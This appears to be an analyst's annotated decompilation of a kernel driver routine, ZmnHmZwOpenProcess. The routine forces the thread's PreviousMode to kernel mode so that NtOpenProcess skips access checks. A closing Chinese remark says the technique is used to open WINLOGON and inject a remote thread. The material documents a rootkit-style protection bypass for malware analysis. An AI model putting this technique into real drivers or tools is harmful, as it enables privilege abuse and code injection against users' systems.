/*
 * ZmnHmZwOpenProcess — decompiler (IDA-style) pseudocode of a kernel-mode
 * wrapper around NtOpenProcess / ZwOpenProcess.
 *
 * Flow: save the thread's current previous mode, try to force it to 0
 * (KernelMode) via ZmnHmKeSetPreviousMode; on success call NtOpenProcess
 * directly and then restore the saved mode, otherwise fall back to the
 * ordinary ZwOpenProcess stub.
 *
 * a1  receives the opened handle (NtOpenProcess ProcessHandle)
 * a2  requested access rights   (DesiredAccess)
 * a3  object attributes          (ObjectAttributes)
 * a4  target client id           (ClientId)
 * Returns the NTSTATUS of whichever open routine was actually called.
 *
 * NOTE(review): calling an Nt* routine with PreviousMode forced to
 * KernelMode makes the kernel treat the pointer arguments as trusted and
 * perform the open with kernel-mode access checking, so the probing and
 * access checks a user-mode caller would be subject to are skipped. That is
 * the "protection bypass" the accompanying note refers to, and is why this
 * pattern (a driver rewriting ETHREAD.PreviousMode) is a strong indicator of
 * rootkit-style behaviour rather than a legitimate driver idiom.
 */
NTSTATUS __fastcall ZmnHmZwOpenProcess(void **a1, ACCESS_MASK a2, struct _OBJECT_ATTRIBUTES *a3, struct _CLIENT_ID *a4)
{
__int64 v4; // rcx  — only its low byte is ever written (see LOBYTE below); the upper bits are
            //        indeterminate. Decompiler artifact: the callee presumably takes a 1-byte
            //        KPROCESSOR_MODE in CL — TODO confirm against ZmnHmKeSetPreviousMode
NTSTATUS result; // eax
KPROCESSOR_MODE v6; // [rsp+30h] [rbp-18h]  — caller's real previous mode, saved for restoration
NTSTATUS v7; // [rsp+34h] [rbp-14h]  — status returned by NtOpenProcess
// Remember the genuine previous mode before tampering with it.
v6 = ExGetPreviousMode();
// Nonzero return is treated as "previous mode successfully forced to 0 (KernelMode)";
// the exact meaning of the return value is not visible in this listing.
if ( (unsigned int)ZmnHmKeSetPreviousMode(0i64) )
{
// DnsPrint_RpcZoneInfo: the symbol name is almost certainly a mis-resolved library
// signature; here it behaves as a debug-trace routine taking
// (level, source file, source line, function name, ?, message).
// The file/line/function strings are from the original driver sources; the
// (unsigned int) casts are decompiler noise truncating the string pointers.
DnsPrint_RpcZoneInfo(
1,
(unsigned int)"HookManager\\HookManager.c",
1360,
(unsigned int)"ZmnHmZwOpenProcess",
0,
"ZmnHmZwOpenProcess calling Nt* routine");
// Direct Nt* call while PreviousMode == KernelMode: no user-mode pointer probing
// or user-mode access check is applied to a1/a3/a4.
v7 = NtOpenProcess(a1, a2, a3, a4);
// Restore the saved previous mode. There is no SEH / cleanup path here, so if
// NtOpenProcess were to raise, the thread would be left with PreviousMode == KernelMode
// (inferred from the absence of any __try/finally in the listing).
LOBYTE(v4) = v6;
ZmnHmKeSetPreviousMode(v4);
result = v7;
}
else
{
// Same trace routine as above, different source line and message.
DnsPrint_RpcZoneInfo(
1,
(unsigned int)"HookManager\\HookManager.c",
1370,
(unsigned int)"ZmnHmZwOpenProcess",
0,
"ZmnHmZwOpenProcess calling Zw* routine");
// Fallback: the ordinary kernel Zw* stub, which by design performs the call with
// PreviousMode set to KernelMode for its own duration and restores it afterwards.
result = ZwOpenProcess(a1, a2, a3, a4);
}
return result;
}
看了一下，将ETHREAD里的PreviousMode强行设为0（内核模式），来绕过一些保护，打开WINLOGON进程句柄，然后创建远线程做事。